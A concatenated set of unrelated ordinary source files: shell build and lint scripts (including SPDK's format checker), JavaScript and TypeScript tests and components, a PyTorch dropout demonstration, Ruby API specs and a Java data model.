echo "$(tput setaf 2)$(tput bold)$(ln -vsf "$lawn_path" "$home_path")$(tput sgr 0)" | sed "s:$HOME:~:g"
elif [[ $(readlink "$home_path") == "$lawn_path" ]]; then
echo "$(tput setaf 4)No change for '$lawn_path'$(tput sgr 0)"
else
echo "$(tput setaf 1)$(tput bold)Skipping '$lawn_path -> $home_path'$(tput sgr 0)" | sed "s:$HOME:~:g"
fi
}
link "shell/zsh" .zshrc
link "vim/vimfiles" .vim
link "tmux.conf" .tmux.conf
link "git/config" .gitconfig
link "alacritty.yml" .config/alacritty.yml
link "mongorc.js" .mongorc.js
link "mongoshrc.js" .mongoshrc.js
link "qutebrowser" .qutebrowser
link "xbar" Library/"Application Support"/xbar/plugins
|
#!/bin/bash
# subsequent sql depends on functions installed
echo "Creating functions..."
psql $@ -f functions.sql
echo "done."
# apply updates in parallel across tables
echo -e "\nApplying updates in parallel across tables..."
psql $@ -f apply-updates-non-planet-tables.sql &
psql $@ -f apply-planet_osm_polygon.sql &
psql $@ -f apply-planet_osm_line.sql &
psql $@ -f apply-planet_osm_point.sql &
wait
echo "done."
echo -e '\nApplying triggers...'
psql $@ -f triggers.sql
echo 'done.'
echo -e "\nAll updates complete. Exiting."
|
#!/usr/bin/env bash
readonly BASEDIR=$(readlink -f $(dirname $0))/..
cd $BASEDIR
# exit on errors
set -e
if ! hash nproc 2>/dev/null; then
function nproc() {
echo 8
}
fi
function version_lt() {
[ $( echo -e "$1\n$2" | sort -V | head -1 ) != "$1" ]
}
rc=0
echo -n "Checking file permissions..."
while read -r perm _res0 _res1 path; do
if [ ! -f "$path" ]; then
continue
fi
fname=$(basename -- "$path")
case ${fname##*.} in
c|h|cpp|cc|cxx|hh|hpp|md|html|js|json|svg|Doxyfile|yml|LICENSE|README|conf|in|Makefile|mk|gitignore|go|txt)
# These file types should never be executable
if [ "$perm" -eq 100755 ]; then
echo "ERROR: $path is marked executable but is a code file."
rc=1
fi
;;
*)
shebang=$(head -n 1 $path | cut -c1-3)
# git only tracks the execute bit, so will only ever return 755 or 644 as the permission.
if [ "$perm" -eq 100755 ]; then
# If the file has execute permission, it should start with a shebang.
if [ "$shebang" != "#!/" ]; then
echo "ERROR: $path is marked executable but does not start with a shebang."
rc=1
fi
else
# If the file doesnot have execute permissions, it should not start with a shebang.
if [ "$shebang" = "#!/" ]; then
echo "ERROR: $path is not marked executable but starts with a shebang."
rc=1
fi
fi
;;
esac
done <<< "$(git grep -I --name-only --untracked -e . | git ls-files -s)"
if [ $rc -eq 0 ]; then
echo " OK"
fi
if hash astyle; then
echo -n "Checking coding style..."
if [ "$(astyle -V)" \< "Artistic Style Version 3" ]
then
echo -n " Your astyle version is too old so skipping coding style checks. Please update astyle to at least 3.0.1 version..."
else
rm -f astyle.log
touch astyle.log
# Exclude rte_vhost code imported from DPDK - we want to keep the original code
# as-is to enable ongoing work to synch with a generic upstream DPDK vhost library,
# rather than making diffs more complicated by a lot of changes to follow SPDK
# coding standards.
git ls-files '*.[ch]' '*.cpp' '*.cc' '*.cxx' '*.hh' '*.hpp' | \
grep -v rte_vhost | grep -v cpp_headers | \
xargs -P$(nproc) -n10 astyle --options=.astylerc >> astyle.log
if grep -q "^Formatted" astyle.log; then
echo " errors detected"
git diff
sed -i -e 's/ / /g' astyle.log
grep --color=auto "^Formatted.*" astyle.log
echo "Incorrect code style detected in one or more files."
echo "The files have been automatically formatted."
echo "Remember to add the files to your commit."
rc=1
else
echo " OK"
fi
rm -f astyle.log
fi
else
echo "You do not have astyle installed so your code style is not being checked!"
fi
GIT_VERSION=$( git --version | cut -d' ' -f3 )
if version_lt "1.9.5" "${GIT_VERSION}"; then
# git <1.9.5 doesn't support pathspec magic exclude
echo " Your git version is too old to perform all tests. Please update git to at least 1.9.5 version..."
exit 0
fi
echo -n "Checking comment style..."
git grep --line-number -e '/[*][^ *-]' -- '*.[ch]' > comment.log || true
git grep --line-number -e '[^ ][*]/' -- '*.[ch]' ':!lib/rte_vhost*/*' >> comment.log || true
git grep --line-number -e '^[*]' -- '*.[ch]' >> comment.log || true
git grep --line-number -e '\s//' -- '*.[ch]' >> comment.log || true
git grep --line-number -e '^//' -- '*.[ch]' >> comment.log || true
if [ -s comment.log ]; then
echo " Incorrect comment formatting detected"
cat comment.log
rc=1
else
echo " OK"
fi
rm -f comment.log
echo -n "Checking for spaces before tabs..."
git grep --line-number $' \t' -- './*' ':!*.patch' > whitespace.log || true
if [ -s whitespace.log ]; then
echo " Spaces before tabs detected"
cat whitespace.log
rc=1
else
echo " OK"
fi
rm -f whitespace.log
echo -n "Checking trailing whitespace in output strings..."
git grep --line-number -e ' \\n"' -- '*.[ch]' > whitespace.log || true
if [ -s whitespace.log ]; then
echo " Incorrect trailing whitespace detected"
cat whitespace.log
rc=1
else
echo " OK"
fi
rm -f whitespace.log
echo -n "Checking for use of forbidden library functions..."
git grep --line-number -w '\(atoi\|atol\|atoll\|strncpy\|strcpy\|strcat\|sprintf\|vsprintf\)' -- './*.c' ':!lib/rte_vhost*/**' > badfunc.log || true
if [ -s badfunc.log ]; then
echo " Forbidden library functions detected"
cat badfunc.log
rc=1
else
echo " OK"
fi
rm -f badfunc.log
echo -n "Checking for use of forbidden CUnit macros..."
git grep --line-number -w 'CU_ASSERT_FATAL' -- 'test/*' ':!test/spdk_cunit.h' > badcunit.log || true
if [ -s badcunit.log ]; then
echo " Forbidden CU_ASSERT_FATAL usage detected - use SPDK_CU_ASSERT_FATAL instead"
cat badcunit.log
rc=1
else
echo " OK"
fi
rm -f badcunit.log
echo -n "Checking blank lines at end of file..."
if ! git grep -I -l -e . -z './*' ':!*.patch' | \
xargs -0 -P$(nproc) -n1 scripts/eofnl > eofnl.log; then
echo " Incorrect end-of-file formatting detected"
cat eofnl.log
rc=1
else
echo " OK"
fi
rm -f eofnl.log
echo -n "Checking for POSIX includes..."
git grep -I -i -f scripts/posix.txt -- './*' ':!include/spdk/stdinc.h' ':!include/linux/**' ':!lib/rte_vhost*/**' ':!scripts/posix.txt' ':!*.patch' > scripts/posix.log || true
if [ -s scripts/posix.log ]; then
echo "POSIX includes detected. Please include spdk/stdinc.h instead."
cat scripts/posix.log
rc=1
else
echo " OK"
fi
rm -f scripts/posix.log
echo -n "Checking #include style..."
git grep -I -i --line-number "#include <spdk/" -- '*.[ch]' > scripts/includes.log || true
if [ -s scripts/includes.log ]; then
echo "Incorrect #include syntax. #includes of spdk/ files should use quotes."
cat scripts/includes.log
rc=1
else
echo " OK"
fi
rm -f scripts/includes.log
if hash pycodestyle 2>/dev/null; then
PEP8=pycodestyle
elif hash pep8 2>/dev/null; then
PEP8=pep8
fi
if [ -n "${PEP8}" ]; then
echo -n "Checking Python style..."
PEP8_ARGS+=" --max-line-length=140"
error=0
git ls-files '*.py' | xargs -P$(nproc) -n1 $PEP8 $PEP8_ARGS > pep8.log || error=1
if [ $error -ne 0 ]; then
echo " Python formatting errors detected"
cat pep8.log
rc=1
else
echo " OK"
fi
rm -f pep8.log
else
echo "You do not have pycodestyle or pep8 installed so your Python style is not being checked!"
fi
if hash shellcheck 2>/dev/null; then
echo -n "Checking Bash style..."
shellcheck_v=$(shellcheck --version | grep -P "version: [0-9\.]+" | cut -d " " -f2)
# SHCK_EXCLUDE contains a list of all of the spellcheck errors found in SPDK scripts
# currently. New errors should only be added to this list if the cost of fixing them
# is deemed too high. For more information about the errors, go to:
# https://github.com/koalaman/shellcheck/wiki/Checks
# Error descriptions can also be found at: https://github.com/koalaman/shellcheck/wiki
# SPDK fails some error checks which have been deprecated in later versions of shellcheck.
# We will not try to fix these error checks, but instead just leave the error types here
# so that we can still run with older versions of shellcheck.
SHCK_EXCLUDE="SC1117"
# SPDK has decided to not fix violations of these errors.
# We are aware about below exclude list and we want this errors to be excluded.
# SC1083: This {/} is literal. Check expression (missing ;/\n?) or quote it.
# SC1090: Can't follow non-constant source. Use a directive to specify location.
# SC1091: Not following: (error message here)
# SC2001: See if you can use ${variable//search/replace} instead.
# SC2010: Don't use ls | grep. Use a glob or a for loop with a condition to allow non-alphanumeric filenames.
# SC2015: Note that A && B || C is not if-then-else. C may run when A is true.
# SC2016: Expressions don't expand in single quotes, use double quotes for that.
# SC2034: foo appears unused. Verify it or export it.
# SC2046: Quote this to prevent word splitting.
# SC2086: Double quote to prevent globbing and word splitting.
# SC2119: Use foo "$@" if function's $1 should mean script's $1.
# SC2120: foo references arguments, but none are ever passed.
# SC2148: Add shebang to the top of your script.
# SC2153: Possible Misspelling: MYVARIABLE may not be assigned, but MY_VARIABLE is.
# SC2154: var is referenced but not assigned.
# SC2164: Use cd ... || exit in case cd fails.
# SC2174: When used with -p, -m only applies to the deepest directory.
# SC2206: Quote to prevent word splitting/globbing,
# or split robustly with mapfile or read -a.
# SC2207: Prefer mapfile or read -a to split command output (or quote to avoid splitting).
# SC2223: This default assignment may cause DoS due to globbing. Quote it.
SHCK_EXCLUDE="$SHCK_EXCLUDE,SC1083,SC1090,SC1091,SC2010,SC2015,SC2016,SC2034,SC2046,SC2086,\
SC2119,SC2120,SC2148,SC2153,SC2154,SC2164,SC2174,SC2001,SC2206,SC2207,SC2223"
SHCK_FORMAT="diff"
SHCK_APPLY=true
if [ "$shellcheck_v" \< "0.7.0" ]; then
SHCK_FORMAT="tty"
SHCK_APPLY=false
fi
SHCH_ARGS=" -x -e $SHCK_EXCLUDE -f $SHCK_FORMAT"
error=0
git ls-files '*.sh' | xargs -P$(nproc) -n1 shellcheck $SHCH_ARGS &> shellcheck.log || error=1
if [ $error -ne 0 ]; then
echo " Bash formatting errors detected!"
# Some errors are not auto-fixable. Fall back to tty output.
if grep -q "Use another format to see them." shellcheck.log; then
SHCK_FORMAT="tty"
SHCK_APPLY=false
SHCH_ARGS=" -e $SHCK_EXCLUDE -f $SHCK_FORMAT"
git ls-files '*.sh' | xargs -P$(nproc) -n1 shellcheck $SHCH_ARGS > shellcheck.log || error=1
fi
cat shellcheck.log
if $SHCK_APPLY; then
git apply shellcheck.log
echo "Bash errors were automatically corrected."
echo "Please remember to add the changes to your commit."
fi
rc=1
else
echo " OK"
fi
rm -f shellcheck.log
else
echo "You do not have shellcheck installed so your Bash style is not being checked!"
fi
# Check if any of the public interfaces were modified by this patch.
# Warn the user to consider updating the changelog any changes
# are detected.
echo -n "Checking whether CHANGELOG.md should be updated..."
staged=$(git diff --name-only --cached .)
working=$(git status -s --porcelain --ignore-submodules | grep -iv "??" | awk '{print $2}')
files="$staged $working"
if [[ "$files" = " " ]]; then
files=$(git diff-tree --no-commit-id --name-only -r HEAD)
fi
has_changelog=0
for f in $files; do
if [[ $f == CHANGELOG.md ]]; then
# The user has a changelog entry, so exit.
has_changelog=1
break
fi
done
needs_changelog=0
if [ $has_changelog -eq 0 ]; then
for f in $files; do
if [[ $f == include/spdk/* ]] || [[ $f == scripts/rpc.py ]] || [[ $f == etc/* ]]; then
echo ""
echo -n "$f was modified. Consider updating CHANGELOG.md."
needs_changelog=1
fi
done
fi
if [ $needs_changelog -eq 0 ]; then
echo " OK"
else
echo ""
fi
exit $rc
|
from construct import Struct, GreedyRange, Int32ul
try:
# Define the structure for parsing the binary file
repeat_eos_u4 = Struct(
'numbers' / GreedyRange(Int32ul),
)
# Read the binary file and parse the integers
with open('input.bin', 'rb') as file:
data = file.read()
parsed_data = repeat_eos_u4.parse(data)
# Calculate the sum of the integers
sum_of_integers = sum(parsed_data['numbers'])
# Print the sum of the integers
print(f"The sum of the integers in the sequence is: {sum_of_integers}")
except FileNotFoundError:
print("Error: The input file 'input.bin' was not found.")
except Exception as e:
print(f"An error occurred: {e}") |
#!/usr/bin/env bash
# This library holds common bash variables and utility functions.
# Variables
#
OS="$(go env GOOS)"
ARCH="$(go env GOARCH)"
root_dir="$(cd "$(dirname "$0")/.." ; pwd)"
dest_dir="${root_dir}/bin"
mkdir -p "${dest_dir}"
# kind
kind_version="v0.8.1"
kind_bin_name="kind-${OS}-${ARCH}"
kind_path="${dest_dir}/kind"
#kubectl
kubectl_path="${dest_dir}/kubectl"
# Utility Functions
#
#
# util::command-installed checks if the command from argument 1 is installed.
#
# Globals:
# None
# Arguments:
# - 1: command name to check if it is installed in PATH
# Returns:
# 0 if command is installed in PATH
# 1 if the command is NOT installed in PATH
function util::command-installed() {
command -v "${1}" >/dev/null 2>&1 || return 1
return 0
}
readonly -f util::command-installed
# util::log echoes the supplied argument with a common header.
#
# Globals:
# None
# Arguments:
# - 1: string to echo
# Returns:
# 0
function util::log() {
echo "##### ${1}..."
}
readonly -f util::log
# util::wait-for-condition blocks until the provided condition becomes true
#
# Globals:
# None
# Arguments:
# - 1: message indicating what conditions is being waited for (e.g. 'config to be written')
# - 2: a string representing an eval'able condition. When eval'd it should not output
# anything to stdout or stderr.
# - 3: optional timeout in seconds. If not provided, waits forever.
# Returns:
# 1 if the condition is not met before the timeout
function util::wait-for-condition() {
local msg=$1
# condition should be a string that can be eval'd.
local condition=$2
local timeout=${3:-}
local start_msg="Waiting for ${msg}"
local error_msg="[ERROR] Timeout waiting for ${msg}"
local counter=0
while ! eval ${condition}; do
if [[ "${counter}" = "0" ]]; then
echo -n "${start_msg}"
fi
if [[ -z "${timeout}" || "${counter}" -lt "${timeout}" ]]; then
counter=$((counter + 1))
if [[ -n "${timeout}" ]]; then
echo -n '.'
fi
sleep 1
else
echo -e "\n${error_msg}"
return 1
fi
done
if [[ "${counter}" != "0" && -n "${timeout}" ]]; then
echo ' done'
fi
}
readonly -f util::wait-for-condition
|
<reponame>nvonahsen/toolbelt
from .functions import *
from .CocoDataset import CocoDataset |
const getErrors = require('../jest.setup')(__dirname);
test('ok', async () => {
expect(await getErrors('ok.js')).toEqual('');
});
test('no-mixed-spaces-and-tabs', async () => {
expect(await getErrors('no-mixed-spaces-and-tabs.js')).toMatchInlineSnapshot(`
"__fixtures__/no-mixed-spaces-and-tabs.js: line 2, col 1, Error - Expected indentation of 2 spaces but found 1 tab. (indent)
1 problem"
`);
});
test('arrow-parens', async () => {
expect(await getErrors('arrow-parens.js')).toMatchInlineSnapshot(`
"__fixtures__/arrow-parens.js: line 2, col 4, Error - Parsing error: Unexpected token >
1 problem"
`);
});
test('indent', async () => {
expect(await getErrors('indent.js')).toMatchInlineSnapshot(`
"__fixtures__/indent.js: line 3, col 1, Error - Expected indentation of 4 spaces but found 6. (indent)
1 problem"
`);
});
|
import { LitElement, html } from '../../vendor/lit-element/lit-element.js'
import * as session from '../lib/session.js'
class AppSession extends LitElement {
static get properties () {
return {
currentError: {type: String}
}
}
createRenderRoot() {
return this // dont use shadow dom
}
constructor () {
super()
this.currentError = undefined
this.isLoggedIn = true
session.onChange(() => {
this.isLoggedIn = session.isActive()
this.requestUpdate()
})
}
render () {
if (!this.isLoggedIn) {
return html`
<div class="bg-yellow-200 font-medium px-4 py-2 sm:rounded text-lg text-yellow-700">You are not currently logged in.</div>
<form class="flex items-center my-1" @submit=${this.onSubmit}>
<input type="text" name="username" placeholder="Username" class="bg-white px-2 py-1 rounded mr-1">
<input type="password" name="password" placeholder="Password" class="bg-white px-2 py-1 rounded mr-1">
<button class="bg-blue-600 text-white px-2 py-1" type="submit">Login</button>
</form>
${this.currentError ? html`
<div class="bg-red-200 font-medium px-4 py-2 sm:rounded text-lg text-red-700">${this.currentError}</div>
` : ''}
`
}
return html``
}
// events
// =
async onSubmit (e) {
e.preventDefault()
e.stopPropagation()
this.currentError = undefined
try {
await session.doLogin({
username: e.currentTarget.username.value,
password: e.currentTarget.password.value
})
} catch (e) {
this.currentError = e.toString()
}
}
}
customElements.define('app-session', AppSession) |
/*
* Copyright © 2020 Lisk Foundation
*
* See the LICENSE file at the top-level directory of this distribution
* for licensing information.
*
* Unless otherwise agreed in a custom licensing agreement with the Lisk Foundation,
* no part of this software, including this file, may be copied, modified,
* propagated, or distributed except according to the terms contained in the
* LICENSE file.
*
* Removal or modification of this copyright notice is prohibited.
*/
import { BFT } from '@liskhq/lisk-bft';
import { codec } from '@liskhq/lisk-codec';
import { KVStore } from '@liskhq/lisk-db';
import { TransactionPool } from '@liskhq/lisk-transaction-pool';
import { when } from 'jest-when';
import { InMemoryChannel } from '../../../src/controller/channels';
import { BaseModule, DPoSModule, TokenModule } from '../../../src/modules';
import { Forger, HighFeeForgingStrategy } from '../../../src/node/forger';
import { Network } from '../../../src/node/network';
import { Node } from '../../../src/node/node';
import { Processor } from '../../../src/node/processor';
import { Synchronizer } from '../../../src/node/synchronizer/synchronizer';
import { cacheConfig, nodeOptions } from '../../fixtures/node';
import { createMockBus } from '../../utils/channel';
import { createGenesisBlock } from '../../../src/testing/create_genesis_block';
jest.mock('@liskhq/lisk-db');
jest.mock('fs-extra');
describe('Node', () => {
let node: Node;
let subscribedEvents: any;
const stubs: any = {};
let blockchainDB: KVStore;
let forgerDB: KVStore;
let nodeDB: KVStore;
let tokenModule: BaseModule;
let dposModule: BaseModule;
const { genesisBlock, genesisBlockJSON } = createGenesisBlock({
modules: [TokenModule, DPoSModule],
});
const lastBlock = genesisBlock;
beforeEach(() => {
// Arrange
subscribedEvents = {};
jest.spyOn(Processor.prototype, 'init').mockResolvedValue(undefined);
jest.spyOn(Synchronizer.prototype, 'init').mockResolvedValue(undefined);
blockchainDB = new KVStore('blockchain.db');
forgerDB = new KVStore('forger.db');
nodeDB = new KVStore('node.db');
tokenModule = new TokenModule(nodeOptions.genesisConfig);
dposModule = new DPoSModule(nodeOptions.genesisConfig);
/* Arranging Stubs start */
stubs.logger = {
trace: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
fatal: jest.fn(),
info: jest.fn(),
cleanup: jest.fn(),
};
stubs.forgerDB = {
get: jest.fn(),
put: jest.fn(),
close: jest.fn(),
};
stubs.channel = {
invoke: jest.fn(),
subscribe: jest.fn((event, cb) => {
subscribedEvents[event] = cb;
}),
once: jest.fn(),
registerToBus: jest.fn(),
};
when(stubs.channel.invoke)
.calledWith('app:getComponentConfig', 'cache')
.mockResolvedValue(cacheConfig as never);
node = new Node({
options: nodeOptions,
});
codec.clearCache();
node.registerModule(tokenModule);
// Because the genesis block contains a delegate, so we must register dpos module to process it
node.registerModule(dposModule);
});
describe('constructor', () => {
it('should throw error when waitThreshold is greater than blockTime', () => {
const invalidChainOptions = {
...nodeOptions,
forging: {
waitThreshold: 5,
},
genesisConfig: {
...nodeOptions.genesisConfig,
blockTime: 4,
},
};
expect(
() =>
new Node({
options: invalidChainOptions as any,
}),
).toThrow('forging.waitThreshold=5 is greater or equal to genesisConfig.blockTime=4');
});
it('should throw error when waitThreshold is same as blockTime', () => {
const invalidChainOptions = {
...nodeOptions,
forging: {
waitThreshold: 5,
},
genesisConfig: {
...nodeOptions.genesisConfig,
blockTime: 5,
},
};
expect(
() =>
new Node({
options: invalidChainOptions as any,
}),
).toThrow('forging.waitThreshold=5 is greater or equal to genesisConfig.blockTime=5');
});
});
describe('init', () => {
beforeEach(async () => {
jest.spyOn(Network.prototype, 'applyNodeInfo');
jest.spyOn(TransactionPool.prototype, 'start');
jest.spyOn(node as any, '_startForging');
jest.spyOn(Processor.prototype, 'register');
jest.spyOn(InMemoryChannel.prototype, 'registerToBus');
jest.spyOn(tokenModule, 'init');
// Act
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
});
it('should initialize scope object with valid structure', () => {
expect(node).toHaveProperty('_options');
expect(node).toHaveProperty('_channel');
expect(node).toHaveProperty('_networkIdentifier');
});
describe('_initModules', () => {
it('should initialize bft module', () => {
expect(node['_bft']).toBeInstanceOf(BFT);
});
it('should initialize forger module', () => {
expect(node['_forger']).toBeInstanceOf(Forger);
});
it('should initialize forger module with high fee strategy', () => {
expect(node['_forger']['_forgingStrategy']).toBeInstanceOf(HighFeeForgingStrategy);
});
});
describe('on-chain modules', () => {
it('should register custom module with processor', () => {
expect(node['_processor'].register).toHaveBeenCalledTimes(2);
expect(node['_processor'].register).toHaveBeenCalledWith(tokenModule);
expect(node['_processor'].register).toHaveBeenCalledWith(dposModule);
});
it('should register in-memory channel to bus', () => {
// one time for each module
expect(InMemoryChannel.prototype.registerToBus).toHaveBeenCalledTimes(2);
expect(InMemoryChannel.prototype.registerToBus).toHaveBeenCalledWith(node['_bus']);
});
it('should init custom module', () => {
expect(tokenModule.init).toHaveBeenCalledTimes(1);
expect(tokenModule.init).toHaveBeenCalledWith(
expect.objectContaining({
channel: { publish: expect.any(Function) },
dataAccess: {
getChainState: expect.any(Function),
getAccountByAddress: expect.any(Function),
getLastBlockHeader: expect.any(Function),
},
logger: stubs.logger,
}),
);
});
});
it('should invoke Processor.init', () => {
expect(node['_processor'].init).toHaveBeenCalledTimes(1);
});
it('should call "applyNodeInfo" with correct params', () => {
// Assert
return expect(node['_networkModule'].applyNodeInfo).toHaveBeenCalledWith({
height: lastBlock.header.height,
blockVersion: lastBlock.header.version,
maxHeightPrevoted: 0,
lastBlockID: lastBlock.header.id,
});
});
it('should start transaction pool', () => {
return expect(node['_transactionPool'].start).toHaveBeenCalled();
});
it('should start forging', () => {
return expect(node['_startForging']).toHaveBeenCalled();
});
});
describe('getSchema', () => {
it('should return all schema with currently registered modules', () => {
const schema = node.getSchema();
expect(Object.keys(schema.account.properties)).toInclude('token');
expect(Object.keys(schema.blockHeadersAssets).length).toBeGreaterThanOrEqual(2);
expect(schema.block).not.toBeUndefined();
expect(schema.blockHeader).not.toBeUndefined();
expect(schema.transaction).not.toBeUndefined();
});
});
describe('getRegisteredModules', () => {
it('should return currently registered modules information', () => {
const registeredModules = node.getRegisteredModules();
expect(registeredModules).toHaveLength(2);
expect(registeredModules[0].name).toEqual('token');
expect(registeredModules[1].name).toEqual('dpos');
});
});
describe('cleanup', () => {
beforeEach(async () => {
// Arrange
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
jest.spyOn(node['_transactionPool'], 'stop');
jest.spyOn(node['_processor'], 'stop');
jest.spyOn(node['_synchronizer'], 'stop');
jest.spyOn(node['_networkModule'], 'cleanup');
});
it('should be an async function', () => {
// Assert
return expect(node.cleanup.constructor.name).toEqual('AsyncFunction');
});
it('should call stop for running tasks', async () => {
await node.cleanup();
// Assert
expect(node['_transactionPool'].stop).toHaveBeenCalled();
expect(node['_synchronizer'].stop).toHaveBeenCalled();
expect(node['_processor'].stop).toHaveBeenCalled();
expect(node['_networkModule'].cleanup).toHaveBeenCalled();
});
});
describe('#_forgingTask', () => {
beforeEach(async () => {
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
jest.spyOn(node['_forger'], 'delegatesEnabled').mockReturnValue(true);
jest.spyOn(node['_forger'], 'forge');
jest.spyOn(node['_synchronizer'], 'isActive', 'get').mockReturnValue(false);
});
it('should halt if no delegates are enabled', async () => {
// Arrange
(node['_forger'].delegatesEnabled as jest.Mock).mockReturnValue(false);
// Act
await node['_forgingTask']();
// Assert
expect(stubs.logger.trace).toHaveBeenNthCalledWith(1, 'No delegates are enabled');
expect(node['_forger'].forge).not.toHaveBeenCalled();
});
it('should halt if the client is not ready to forge (is syncing)', async () => {
// Arrange
jest.spyOn(node['_synchronizer'], 'isActive', 'get').mockReturnValue(true);
// Act
await node['_forgingTask']();
// Assert
expect(stubs.logger.debug).toHaveBeenNthCalledWith(1, 'Client not ready to forge');
expect(node['_forger'].forge).not.toHaveBeenCalled();
});
it('should execute forger.forge otherwise', async () => {
await node['_forgingTask']();
expect(node['_forger'].forge).toHaveBeenCalled();
});
});
describe('#_startForging', () => {
beforeEach(async () => {
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
jest.spyOn(node['_forger'], 'loadDelegates');
});
it('should load the delegates', async () => {
await node['_startForging']();
expect(node['_forger'].loadDelegates).toHaveBeenCalled();
});
it('should register a task in Jobs Queue named "nextForge" with a designated interval', async () => {
await node['_startForging']();
expect(node['_forgingJob']).not.toBeUndefined();
});
});
});
|
let Stack = function() {
let someInstance = {};
// Use an object with numeric keys to store values
let storage = {};
let length = 0;
// Implement the methods below
someInstance.push = function(value) {
storage[length] = value;
length++;
};
someInstance.pop = function() {
length && length--;
return storage[length];
};
someInstance.size = function() {
return length;
};
return someInstance;
};
|
<reponame>Shuai-Xie/pytorch-examples
import torch
import torch.nn as nn
"""
apply 函数
Function.apply: fowward 前向
Module.apply: apply(fn) 对所有子模块都使用 fn
"""
def turn_on_dropout(module):
if type(module) == torch.nn.Dropout:
module.train()
def turn_off_dropout(module):
if type(module) == torch.nn.Dropout:
module.eval()
def apply_dropout(model):
model.eval()
model.apply(turn_on_dropout) # 在 eval 也能开启 dropout,用于 AL
def train_eval_dropout():
"""
dropout 采用 bagging 思想
bagging:
使用 bootstrap-sample 在不同数据集上 训练得到不同模型,最后 sum 各个模型的结果作为最终结果,各个模型独立
降低方差,降低过拟合;针对强学习器,如决策树
boosting:
包括 Adaboost 和 GBDT
串行集成一系列弱学习器,模型是有顺序的; 根据上一个模型的预测结果,reweight sample 发现困难样本
train/test 时 scale 是为了保障 输入输出分布的期望一致
Inverted dropout 在 train 时 scale dropout 后的结果,test 时就不用改变了
为什么是保证 x_after_dropout 和 x_before_dropout 的期望相同 ?
因为 dropout 层的输出 作为下一层的输入,来学习每个 w; 而每个 w 的输入是 w*x 求和的形式,将 x 放大,w 就不会学大了
最初版本的 dropout 在 train 上没有 放大输出,而在 test 时缩小输出
放大输出后,train 时的 w 就不会学得偏大了
"""
a = torch.ones(10)
print(a)
m = nn.Dropout(p=0.2)
print(m.training) # True; 默认 train 状态
print(m(a)) # scale output 输出, * 1 / (1-p)
m.eval()
print(m(a)) # 全部 神经元 使用
def diff_drop_drop2d():
a = torch.ones(1, 2, 4, 4) * 10
r = 0.5
print(a)
print(nn.Dropout(r)(a)) # 每张 feature map 随机去掉 一半 pixel
print(nn.Dropout2d(r)(a)) # 将 一半的 feature maps 直接置为 0
if __name__ == '__main__':
diff_drop_drop2d()
|
require 'spec_helper'
describe "Flows" do
before(:all) do
Telemetry.token = "test-api-token"
Telemetry.logger.level = Logger::DEBUG
end
it "should update a Barchart", flows: true do
properties = {
tag: "test-flow-barchart",
bars: [{value:1000, label:'test', color:'red'}]
}
Telemetry::Barchart.new(properties).emit
end
it "should update a Bulletchart", flows: true do
properties = {
tag: "test-flow-bulletchart",
bulletcharts: [{value: 34, max: 4434}]
}
Telemetry::Bulletchart.new(properties).emit
end
it "should update a Countdown", flows: true do
properties = {
tag: "test-flow-countdown",
time: 1373664109,
message: "Party Time"
}
Telemetry::Countdown.new(properties).emit
end
it "should update a Gauge" do
properties = {
tag: "test-flow-gauge",
value: 3434
}
Telemetry::Gauge.new(properties).emit
end
it "should update a Graph" do
properties = {
tag: "test-flow-graph",
series: [{values:[4,3,53,3,54,33,21]}]
}
Telemetry::Graph.new(properties).emit
end
it "should update a Icon" do
properties = {
tag: "test-flow-icon",
icons: [{type: "icon-dashboard", label: "Alert", color: "red"}]
}
Telemetry::Icon.new(properties).emit
end
it "should update a Log" do
properties = {
tag: "test-flow-log",
messages: [{timestamp: 1373664109, text: "This is a first message", color: "red"}]
}
Telemetry::Log.new(properties).emit
end
it "should update a Multigauge" do
properties = {
tag: "test-flow-multigauge",
gauges: [{value: 34, label: "Alpha"},{value: 23, label: "Alpha"}]
}
Telemetry::Multigauge.new(properties).emit
end
it "should update a Multivalue" do
properties = {
tag: "test-flow-multivalue",
values: [{value: 34, label: "Alpha"},{value: 344, label: "Bravo"}]
}
Telemetry::Multivalue.new(properties).emit
end
it "should update a Servers" do
properties = {
tag: "test-flow-servers",
servers: [{values: [33,22,55], name: "Alpha"}]
}
Telemetry::Servers.new(properties).emit
end
it "should update a Status" do
properties = {
tag: "test-flow-status",
statuses: [{label: "Alpha", color: "red"}]
}
Telemetry::Status.new(properties).emit
end
it "should update a Table" do
properties = {
tag: "test-flow-table",
table: [["Row1Col1", "Row1Col2", "Row1Col3"]]
}
Telemetry::Table.new(properties).emit
end
it "should update a Text" do
properties = {
tag: "test-flow-text",
text: "testing"
}
Telemetry::Text.new(properties).emit
end
it "should update a Tickertape" do
properties = {
tag: "test-flow-tickertape",
messages: ["Hello World!"]
}
Telemetry::Tickertape.new(properties).emit
end
it "should update a Timeline" do
properties = {
tag: "test-flow-timeline",
messages: [{timestamp: 1373665284, from: "Telemetry", text: "This is the second message"}]
}
Telemetry::Timeline.new(properties).emit
end
it "should update a Timeseries" do
properties = {
tag: "test-flow-timeseries",
values: [33],
interval: "seconds",
interval_count: 60,
series_metadata: [{aggregation: "avg"}]
}
Telemetry::Timeseries.new(properties).emit
end
it "should update a Upstatus" do
properties = {
tag: "test-flow-upstatus",
up: ["www.telemetryapp.com"]
}
Telemetry::Upstatus.new(properties).emit
end
it "should update a Value" do
properties = {
tag: "test-flow-value",
value: 3434
}
Telemetry::Value.new(properties).emit
end
end
|
package models;
import java.util.Date;
import java.util.List;
import scala.Option;
import utils.Utils;
/*
* @Author(name="<NAME>")
*/
public class CourseMeeting {
public String _id;
public int group;
public String place;
public String date;
public String subject;
public String description;
public enum meetingStatusEnum {Planned,Done,Cancelled};
public meetingStatusEnum meetingStatus;
public String instructor_id;
public List<String> presentMembers_ids;
public CourseMeeting() {}
@Override
public String toString() {
return this.place + " at : " + this.date;
}
}
|
